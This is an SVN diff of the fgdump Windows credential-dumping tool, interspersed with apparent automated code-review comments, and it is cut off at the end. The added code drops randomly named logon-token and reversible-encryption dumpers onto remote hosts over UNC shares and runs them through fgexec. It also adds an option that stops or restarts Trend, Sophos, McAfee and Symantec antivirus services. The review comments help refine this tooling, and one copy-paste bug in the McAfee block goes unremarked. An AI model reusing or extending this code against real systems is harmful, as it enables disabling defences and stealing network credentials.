Index: fgdump.rc =================================================================== --- fgdump.rc (revision 1246) +++ fgdump.rc (revision 1355) @@ -57,6 +57,8 @@ IDR_CACHEDUMP64 BIN "cachedump64.exe" IDR_PWDUMP BIN "PwDump.exe" IDR_FGEXEC BIN "fgexec.exe" +IDR_WHOSTHERE BIN "whosthere.exe" +IDR_REVDUMP BIN "revdump.exe" ///////////////////////////////////////////////////////////////////////////// // Index: pstgdump/Release/pstgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: pstgdump/pstgdump.vcproj =================================================================== --- pstgdump/pstgdump.vcproj (revision 1246) +++ pstgdump/pstgdump.vcproj (revision 1355) @@ -1,110 +1,173 @@ + Keyword="Win32Proj" + TargetFrameworkVersion="131072" + > + Name="Win32" + /> + + + InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops" + CharacterSet="2" + > + + + + + + Detect64BitPortabilityProblems="true" + DebugInformationFormat="4" + /> + Name="VCManagedResourceCompilerTool" + /> + + + RandomizedBaseAddress="1" + DataExecutionPrevention="0" + TargetMachine="1" + /> + Name="VCALinkTool" + /> + Name="VCManifestTool" + /> + Name="VCXDCMakeTool" + /> + Name="VCBscMakeTool" + /> + Name="VCFxCopTool" + /> + Name="VCAppVerifierTool" + /> - - - + Name="VCPostBuildEventTool" + /> + InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops" + CharacterSet="2" + > + + + + + + Detect64BitPortabilityProblems="true" + DebugInformationFormat="3" + /> + Name="VCManagedResourceCompilerTool" + /> + + + RandomizedBaseAddress="1" + DataExecutionPrevention="0" + TargetMachine="1" + /> + Name="VCALinkTool" + /> + Name="VCManifestTool" + /> + Name="VCXDCMakeTool" + /> + Name="VCBscMakeTool" + /> + Name="VCFxCopTool" + /> + Name="VCAppVerifierTool" + /> - - - + Name="VCPostBuildEventTool" + /> 
@@ -113,53 +176,68 @@ + UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" + > + RelativePath=".\ProtectedStorage.cpp" + > + RelativePath=".\pstgdump.cpp" + > + RelativePath=".\stdafx.cpp" + > + Name="Debug|Win32" + > + UsePrecompiledHeader="1" + /> + Name="Release|Win32" + > + UsePrecompiledHeader="1" + /> + RelativePath=".\XGetopt.cpp" + > + UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" + > + RelativePath=".\ProtectedStorage.h" + > + RelativePath=".\debug\pstorec.tlh" + > + RelativePath=".\stdafx.h" + > + RelativePath=".\XGetopt.h" + > + UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}" + > Index: pstgdump/Debug/pstgdump.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: fgdump.cpp =================================================================== --- fgdump.cpp (revision 1246) +++ fgdump.cpp (revision 1355) @@ -33,6 +33,8 @@ bFullRun = true; bRunPwdump = true; bRunCachedump = true; + bRunWhosThere = false; + bRunRevDump = false; bRunPStgDump = false; bSkipExisting = true; bContinueOnUnknownAV = false; @@ -50,6 +52,7 @@ bSkipPwdumpHistory = false; bRunLocal = false; bSkipAVCheck = false; + bToggleAV = false; nOSBits = 0; // OS 32/64 flag has not been overridden memset(lpszSourceFile, 0, MAX_PATH + 1); @@ -120,6 +123,12 @@ bFullRun = !bTestOnly; } +void FGDump::SetToggleOnlyAV(bool bToggleOnly) +{ + bToggleAV = bToggleOnly; + bFullRun = false; +} + void FGDump::SetSkipCacheDump(bool bSkip) { bRunCachedump = !bSkip; @@ -129,7 +138,17 @@ { bRunPwdump = !bSkip; } +void FGDump::SetSkipWhosThere(bool bSkip) +{ + bRunWhosThere = !bSkip; +} +void FGDump::SetSkipRevDump(bool bSkip) +{ + bRunRevDump = !bSkip; +} + + void FGDump::SetSkipProtectedStorageDump(bool bSkip) { bRunPStgDump = !bSkip; 
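Review bot: In the fgdump.cpp hunk @@ -120, SetToggleOnlyAV clears bFullRun unconditionally, while SetTestOnlyAV in the context line directly above derives it from its argument (`bFullRun = !bTestOnly;`), so `SetToggleOnlyAV(false)` would still disable the full run. If the two setters are meant to be symmetric, `bFullRun = !bToggleOnly;` is the matching form; either way the method needs a one-line comment stating that toggling AV is mutually exclusive with running the dumps, because neither this file nor fgdump.h (later hunk) says so. The SetSkipWhosThere/SetSkipRevDump additions in the @@ -129 hunk on this line also leave two stray blank lines before SetSkipProtectedStorageDump where the other setters are separated by one.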
@@ -201,7 +220,7 @@ { ResourceLoader objResPWDump, objResFGExec; ResourceLoader objLSADump, objResCacheDump, objResPStgDump; - ResourceLoader objResCacheDump64; + ResourceLoader objResCacheDump64, objResWhosThere, objResRevDump; size_t nLen; FILE* fileInput = NULL; char szPwdTemp[101]; @@ -259,7 +278,7 @@ SetPassword(szPwdTemp); } - if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true) + if ((bRunCachedump == false && bRunPwdump == false && bRunWhosThere == false && bRunRevDump == false) && bFullRun == true) { Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n"); ExitApp(1); @@ -299,6 +318,8 @@ memset(lpszPWDumpPath, 0, MAX_PATH + 15); memset(lpszFGExecPath, 0, MAX_PATH + 15); memset(lpszCacheDumpPath, 0, MAX_PATH + 15); + memset(lpszWhosTherePath, 0, MAX_PATH + 15); + memset(lpszRevDumpPath, 0, MAX_PATH + 15); memset(lpszPStoragePath, 0, MAX_PATH + 15); memset(lpszCacheDump64Path, 0, MAX_PATH + 15); 
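Review bot: The error text in the @@ -259 hunk no longer matches the condition it guards: the check now also requires bRunWhosThere and bRunRevDump to be false, but the message still says only `-c *and* -w, unless you use -t`. Suggest `Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w together unless you also use -x, -y or -t\n");` so the user learns how the new options interact with the old ones. The enclosing function starts and ends outside the hunk.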
@@ -308,12 +329,18 @@ RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); temp = lpszFgExecExeName; RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); + temp = lpszWhosThereExeName; + RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); + temp = lpszRevDumpExeName; + RandomName::GetRandomName((char**)&temp, 5, 10, "exe"); _snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe"); _snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszFgExecExeName); _snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDumpExeName); _snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe"); _snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDump64ExeName); + _snprintf(lpszWhosTherePath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszWhosThereExeName); + _snprintf(lpszRevDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszRevDumpExeName); // If antivirus is running locally, turn it off, since it may disrupt the storage // of the worker files locally. Only do this if the user hasn't disabled it. @@ -349,6 +376,10 @@ ExitApp(1); if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path)) ExitApp(1); + if (!objResWhosThere.UnpackResource(IDR_WHOSTHERE, lpszWhosTherePath)) + ExitApp(1); + if (!objResRevDump.UnpackResource(IDR_REVDUMP, lpszRevDumpPath)) + ExitApp(1); // Set up the thread pool CreateThreadPool(); Index: RevDumpControl.h =================================================================== --- RevDumpControl.h (revision 0) +++ RevDumpControl.h (revision 1355) 
@@ -0,0 +1,37 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2010 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#pragma once +#ifndef _REVDUMPCONTROL_H +#define _REVDUMPCONTROL_H + +class RevDumpControl +{ +public: + RevDumpControl(LONG nCacheID = -1); + ~RevDumpControl(void); + + bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL); + +private: + LONG m_nCacheID; + +}; + +#endif \ No newline at end of file Index: HostDumper.cpp =================================================================== --- HostDumper.cpp (revision 1246) +++ HostDumper.cpp (revision 1355) @@ -20,6 +20,8 @@ #include "StdAfx.h" #include "hostdumper.h" #include "CacheDumpControl.h" +#include "WhosThereControl.h" +#include "RevDumpControl.h" #include "ProtectedStorageControl.h" #include "ServiceControl.h" #include "Impersonator.h" 
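Review bot: Execute takes lpszMachine, lpszExeName and lpszPipeName as mutable `char*` although RevDumpControl.cpp (later hunk) only reads them via _scprintf/_snprintf/strlen; declaring them `const char*` like the first two parameters would document that and let callers pass literals without a cast. The header also stacks `#pragma once` on top of an include guard, and `~RevDumpControl(void)` is C-style spelling. A short comment on Execute stating its contract — returns true only when the child process finished within the wait and its output was written to `<machine>.revdump` relative to the working directory — would save readers a trip into the .cpp. WhosThereControl.h further down has the same three issues.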
@@ -81,7 +83,7 @@ PWDumpControl objPWDump(nCacheID); Impersonator impersonate(nCacheID); char szPath[MAX_PATH + 1]; - bool bSkipPwdump = false, bSkipCachedump = false, bSkipPStg = true; + bool bSkipPwdump = false, bSkipCachedump = false, bSkipWhosThere = false, bSkipPStg = true, bSkipRevDump = false; char* szWindowsVersion; GUID guidPipe; WCHAR wszGUID[CHARS_IN_GUID + 1]; @@ -121,12 +123,24 @@ Log.CachedReportError(nCacheID, INFO, "INFO: skipping cachedump on %s because %s exists or I was told to skip cache dumps\n", lpszServer, szPath); memset(szPath, 0, MAX_PATH + 1); + _snprintf(szPath, MAX_PATH, "%s.whosthere", lpszServer); + bSkipWhosThere = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunWhosThere; + if (bSkipWhosThere) + Log.CachedReportError(nCacheID, INFO, "INFO: skipping token dump on %s because %s exists or I was told to skip token dumps\n", lpszServer, szPath); + + memset(szPath, 0, MAX_PATH + 1); + _snprintf(szPath, MAX_PATH, "%s.revdump", lpszServer); + bSkipRevDump = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunRevDump; + if (bSkipRevDump) + Log.CachedReportError(nCacheID, INFO, "INFO: skipping reversible encryption value dump on %s because %s exists or I was told to skip reversible encryption dumps\n", lpszServer, szPath); + + memset(szPath, 0, MAX_PATH + 1); _snprintf(szPath, MAX_PATH, "%s.lsadump", lpszServer); bSkipPStg = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunPStgDump; if (bSkipPStg) Log.CachedReportError(nCacheID, INFO, "INFO: skipping dump of protected storage secrets on %s because %s exists or I was told to skip LSA dumps\n", lpszServer, szPath); - if (bSkipCachedump && bSkipPwdump && bSkipPStg) + if (bSkipCachedump && bSkipPwdump && bSkipWhosThere && bSkipPStg && bSkipRevDump) { Log.CachedReportError(nCacheID, CRITICAL, "Skipping: nothing to do\n"); LogFailed.WriteFailedHost(lpszServer, FGDUMP_ERROR_BASE + 1, false, "Skipping: nothing to do"); 
@@ -220,10 +234,19 @@ switch(sControls.objTrendService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Trend is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bTrendAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bTrendAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Trend is running on this machine, shutting it down for a bit...\n"); @@ -232,6 +255,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Trend AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bTrendAVIsRunning = false; } else { 
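Review bot: In the new AV_STOPPED branch, `bTrendAVIsRunning = true` is written right after the service was observed as stopped, so the flag now means "the later restore step should act on this service" rather than "was running", and nothing at the assignment says so; the restore logic that consumes the flag is outside the hunk. A comment such as `// toggle mode: mark the service so the restore step below acts on it` at each of these assignments would stop a reader from reading the line as a bug. The same overloaded use appears in the Sophos, McAfee and Symantec blocks on the following lines; the four blocks differ only in names and are prone to drift, so a helper taking the service controller and the flag by reference would keep them in step.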
@@ -259,10 +285,19 @@ switch(sControls.objSophosService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Sophos is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bSophosAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bSophosAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Sophos is running on this machine, shutting it down for a bit...\n"); @@ -271,6 +306,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Sophos AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSophosAVIsRunning = false; } else { 
@@ -298,10 +336,19 @@ switch(sControls.objMcAfeeService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "McAfee is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bMCAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bMCAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "McAfee is running on this machine, shutting it down for a bit...\n"); @@ -310,6 +357,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "McAfee AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSymantecAVIsRunning = false; } else { 
@@ -337,10 +387,19 @@ switch(sControls.objSAVService->GetServiceState(lpszServer)) { case AV_STOPPED: - Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + if (fgdumpMain->bToggleAV) + { + Log.CachedReportError(nCacheID, INFO, "Symantec is installed on this box, but currently not running. Restarting it as requested by user.\n"); + bSymantecAVIsRunning = true; + } + else + { + Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n"); + } + break; case AV_STARTED: - if (fgdumpMain->bFullRun) + if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV)) { bSymantecAVIsRunning = true; Log.CachedReportError(nCacheID, INFO, "Symantec is running on this machine, shutting it down for a bit...\n"); @@ -349,6 +408,9 @@ LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Symantec AV was running but could not be stopped"); throw(1); } + + if (fgdumpMain->bToggleAV) + bSymantecAVIsRunning = false; } else { 
@@ -416,6 +478,42 @@ } } + if (!bSkipWhosThere) + { + if (bRunLocal) + { + if (RunWhosThere(fgdumpMain->lpszTempPath) == false) // Don't want a pipe for local stuff + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log"); + } + } + else + { + if (RunWhosThere(fgdumpMain->lpszTempPath, lpszPipeName) == false) + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log"); + } + } + } + + if (!bSkipRevDump) + { + if (bRunLocal) + { + if (RunRevDump(fgdumpMain->lpszTempPath, NULL) == false) // Don't want a pipe for local stuff + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log"); + } + } + else + { + if (RunRevDump(fgdumpMain->lpszTempPath, lpszPipeName) == false) + { + LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log"); + } + } + } + if (!bSkipPStg) { if (RunProtectedStorageDump(fgdumpMain->lpszTempPath, lpszUser, lpszPassword, lpszPipeName) == false) @@ -630,6 +728,10 @@ DeleteFile(lpszRemotePath); _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszCacheDump64ExeName); DeleteFile(lpszRemotePath); + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName); + DeleteFile(lpszRemotePath); + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName); + DeleteFile(lpszRemotePath); _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszFgExecExeName); DeleteFile(lpszRemotePath); 
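Review bot: The two new blocks in the @@ -416 hunk duplicate the local/remote branches only to vary one argument, and both arms log the identical failure message; `if (RunWhosThere(fgdumpMain->lpszTempPath, bRunLocal ? NULL : lpszPipeName) == false)` (and likewise for RunRevDump) expresses the same thing in one call with one log line. RunWhosThere's local arm also relies on the default-argument NULL while RunRevDump's passes it explicitly; pick one form for both. The enclosing function starts and ends outside the hunk.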
@@ -652,6 +754,38 @@ return true; } +bool HostDumper::RunWhosThere(char* lpszTempPath, char* lpszPipeName) +{ + WhosThereControl objWhosThere(nCacheID); + + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName); + CopyFile(fgdumpMain->lpszWhosTherePath, lpszRemotePath, FALSE); + + if (!objWhosThere.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszWhosThereExeName, lpszPipeName)) + { + Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump logon tokens\n"); + return false; + } + + return true; +} + +bool HostDumper::RunRevDump(char* lpszTempPath, char* lpszPipeName) +{ + RevDumpControl objRevDump(nCacheID); + + _snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName); + CopyFile(fgdumpMain->lpszRevDumpPath, lpszRemotePath, FALSE); + + if (!objRevDump.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszRevDumpExeName, lpszPipeName)) + { + Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump reversible encryption values\n"); + return false; + } + + return true; +} + bool HostDumper::RunProtectedStorageDump(char* lpszTempPath, char* lpszUser, char* lpszPassword, char* lpszPipeName) { ProtectedStorageControl objPStgDump(nCacheID); Index: fgdump.vcproj =================================================================== --- fgdump.vcproj (revision 1246) +++ fgdump.vcproj (revision 1355) @@ -249,6 +249,10 @@ > + + @@ -293,6 +297,10 @@ > + + @@ -375,6 +383,10 @@ > + + @@ -403,6 +415,10 @@ > + + @@ -466,6 +482,10 @@ > + + 
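Review bot: In RunWhosThere and RunRevDump the CopyFile return value is ignored, so a failed copy is only discovered when Execute later fails with the generic "Failed to dump" message and GetLastError no longer reflects the copy. Check it and report at the point of failure: `if (!CopyFile(fgdumpMain->lpszWhosTherePath, lpszRemotePath, FALSE)) { Log.CachedReportError(nCacheID, CRITICAL, "Failed to copy %s to %s\n", fgdumpMain->lpszWhosTherePath, lpszRemotePath); return false; }`, and the same for RunRevDump. Both functions also accept lpszTempPath but never use it, and they pass lpszCacheDumpRemotePath to Execute rather than a path derived from the lpszRemotePath they just wrote — presumably the same directory, but a comment confirming that would help.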
@@ -473,6 +493,10 @@ RelativePath=".\servpw64.exe" > + + Index: fgexec/Release/fgexec.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: fgexec/Debug/fgexec.exe =================================================================== Cannot display: file marked as a binary type. svn:mime-type = application/octet-stream Index: RevDumpControl.cpp =================================================================== --- RevDumpControl.cpp (revision 0) +++ RevDumpControl.cpp (revision 1355) 
@@ -0,0 +1,136 @@ +/****************************************************************************** +fgdump - by fizzgig and the foofus.net group +Copyright (C) 2010 by JoMo-Kun +http://www.foofus.net + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +******************************************************************************/ +#include "StdAfx.h" +#include "RevDumpControl.h" +#include "Process.h" + +RevDumpControl::RevDumpControl(LONG nCacheID) +{ + m_nCacheID = nCacheID; +} + + +RevDumpControl::~RevDumpControl(void) +{ + +} + +bool RevDumpControl::Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName) +{ + char* lpszCmdLineFormat; + int nArgSize; + char* lpszStopCmdLine; + char* lpszParams; + bool result = false; + + if (lpszPipeName == NULL) + { + // Set the local RevDump path + lpszCmdLineFormat = "%s\\%s"; + nArgSize = _scprintf(lpszCmdLineFormat, lpszDumpPath, lpszExeName); + lpszStopCmdLine = new char[nArgSize + 1]; + memset(lpszStopCmdLine, 0, nArgSize + 1); + _snprintf(lpszStopCmdLine, nArgSize, lpszCmdLineFormat, lpszDumpPath, lpszExeName); + + // Now set the parameters + lpszCmdLineFormat = " -l"; + nArgSize = strlen(lpszCmdLineFormat); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, 
lpszCmdLineFormat); + } + else + { + lpszStopCmdLine = new char[strlen(lpszPSExecPath) + 1]; + memset(lpszStopCmdLine, 0, strlen(lpszPSExecPath) + 1); + strncpy(lpszStopCmdLine, lpszPSExecPath, strlen(lpszPSExecPath)); + + lpszCmdLineFormat = " -c -n %s %s \"%s\\%s \" -l"; + + nArgSize = _scprintf(lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + lpszParams = new char[nArgSize + 1]; + memset(lpszParams, 0, nArgSize + 1); + _snprintf(lpszParams, nArgSize, lpszCmdLineFormat, lpszPipeName, lpszMachine, lpszDumpPath, lpszExeName); + } + + try + { + Process p; + + HANDLE hProcess = p.CreateProcess(lpszStopCmdLine, lpszParams); + if (hProcess != 0) + { + DWORD dwResult = WaitForSingleObject(hProcess, 1200000); // Wait 20 minutes for process to complete + if (dwResult != WAIT_OBJECT_0) + { + Log.CachedReportError(m_nCacheID, CRITICAL, "Warning: RevDump did not complete in a timely manner - exiting"); + result = false; + } + else + { + // Read from process's output + char* szResult; + int nSize = 65535; + + szResult = new char[nSize]; + memset(szResult, 0, nSize); + p.ReadFromPipe(&szResult, nSize); + + // Was it successful? 
+ if (strstr(szResult, "RevDump ") != NULL) + { + // Success + // Write results to a file + size_t nLen = strlen(lpszMachine) + 8; // 8 chars accounts for ".revdump" extension + char* szTempFilename = new char[nLen + 1]; + memset(szTempFilename, 0, nLen + 1); + _snprintf(szTempFilename, nLen, "%s.revdump", lpszMachine); + + std::ofstream outputFile(szTempFilename, std::ios::out | std::ios::trunc); + outputFile.write((const char*)szResult, (DWORD)strlen(szResult)); + outputFile.close(); + delete [] szTempFilename; + Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine); + result = true; + } + else + { + // Failed + Log.CachedReportError(m_nCacheID, CRITICAL, "Failed to dump reversible encryption values (the text returned follows):\n%s", szResult); + result = false; + } + + delete [] szResult; + } + } + else + result = false; + } + catch(...) + { + result = false; + } + + delete [] lpszStopCmdLine; + delete [] lpszParams; + + return result; +} + Index: Main.cpp =================================================================== --- Main.cpp (revision 1246) +++ Main.cpp (revision 1355) 
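Review bot: In RevDumpControl::Execute the buffers allocated with `new char[]` after the wait (`szResult`, `szTempFilename`) are never released if anything between the allocation and the `delete []` throws; the `catch(...)` swallows the exception, the memory leaks, and the reason is lost. A std::string or std::vector<char> for these (and for lpszStopCmdLine/lpszParams) would make the cleanup automatic and let the catch at least log what was thrown. The success call `Log.CachedReportError(m_nCacheID, CRITICAL, "Reversible encryption values dumped successfully\n", lpszMachine)` passes lpszMachine with no matching format specifier — presumably a lost "on %s" — and reports a success at CRITICAL. The output filename is built from lpszMachine unvalidated and opened relative to the working directory, so a host entry containing path separators would be written elsewhere; worth a check if host lists come from files. WhosThereControl.cpp further down is a near-verbatim copy with the same issues, differing only in four strings, and the two classes should share one implementation.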
@@ -24,12 +24,15 @@ void Usage() { printf("Usage:\n"); - printf("%s [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump"); + printf("%s [-?][-t][-e][-c][-w][-x][-y][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]\n", "fgdump"); printf("\t where Username and Password have administrator credentials\n"); printf("\t -? displays help (you're looking at it!)\n"); printf("\t -t will test for the presence of antivirus without actually running the password dumps\n"); + printf("\t -e will toggle antivirus state (e.g. if enabled, then disable) \n"); printf("\t -c skips the cache dump\n"); printf("\t -w skips the password dump\n"); + printf("\t -x performs the logon token dump\n"); + printf("\t -y performs the reversible encryption value dump\n"); printf("\t -s performs the protected storage dump\n"); printf("\t -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.\n"); printf("\t -v makes output more verbose. Use twice for greater effect\n"); @@ -52,7 +55,7 @@ printf("fgDump 2.2.0 - fizzgig and the mighty group at foofus.net\n"); printf("*** THIS IS A BETA VERSION, YOU HAVE BEEN WARNED ***\n"); - printf("Written to make j0m0kun's life just a bit easier\n"); + printf("Written to make JoMo-Kun's life just a bit easier\n"); printf("Copyright(C) 2008 fizzgig and foofus.net\n"); printf("fgdump comes with ABSOLUTELY NO WARRANTY!\n"); printf("This is free software, and you are welcome to redistribute it\n"); @@ -64,7 +67,7 @@ printf("No parameters specified, doing a local dump. Specify -? if you are looking for help.\n"); } - while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoa?"))) != EOF) + while ((c = getopt(argc, argv, _T("h:tf:H:u:p:l:T:O:cwrvskoaexy?"))) != EOF) { switch(c) { 
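Review bot: The new `-e` help line in Usage says only that the option toggles antivirus state, but SetToggleOnlyAV (fgdump.cpp hunk above) also clears bFullRun, so it appears to run no dumps, like `-t`; the help text should say so, e.g. `printf("\t -e will toggle antivirus state (e.g. if enabled, then disable) without running the dumps\n");`. The `-x`/`-y` lines likewise do not mention that these dumps are off by default (bRunWhosThere/bRunRevDump are initialised to false) or that, once one of them is given, `-c -w` is accepted by the changed check in fgdump.cpp.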
@@ -77,6 +80,9 @@ case 't': fgd.SetTestOnlyAV(true); // Only check for AV break; + case 'e': + fgd.SetToggleOnlyAV(true); // Only toggle AV state + break; case 'f': if (strlen(optarg) > MAX_PATH) { @@ -111,6 +117,12 @@ case 'w': fgd.SetSkipPWDump(true); break; + case 'x': + fgd.SetSkipWhosThere(false); + break; + case 'y': + fgd.SetSkipRevDump(false); + break; case 's': fgd.SetSkipProtectedStorageDump(false); break; Index: fgdump.h =================================================================== --- fgdump.h (revision 1246) +++ fgdump.h (revision 1355) @@ -52,21 +52,28 @@ char lpszPSServicePath[MAX_PATH + 15]; char lpszCacheDumpPath[MAX_PATH + 15]; char lpszCacheDump64Path[MAX_PATH + 15]; + char lpszWhosTherePath[MAX_PATH + 15]; + char lpszRevDumpPath[MAX_PATH + 15]; char lpszPStoragePath[MAX_PATH + 15]; char lpszFGExecPath[MAX_PATH + 15]; char lpszCacheDumpExeName[MAX_EXE_NAME_LEN + 1]; char lpszCacheDump64ExeName[MAX_EXE_NAME_LEN + 1]; + char lpszWhosThereExeName[MAX_EXE_NAME_LEN + 1]; + char lpszRevDumpExeName[MAX_EXE_NAME_LEN + 1]; char lpszFgExecExeName[MAX_EXE_NAME_LEN + 1]; - bool bFullRun, bRunPwdump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV; + bool bFullRun, bRunPwdump, bRunWhosThere, bRunRevDump, bRunCachedump, bRunPStgDump, bSkipExisting, bContinueOnUnknownAV, bToggleAV; bool bSkipPwdumpHistory; bool bRunLocal; bool bSkipAVCheck; int 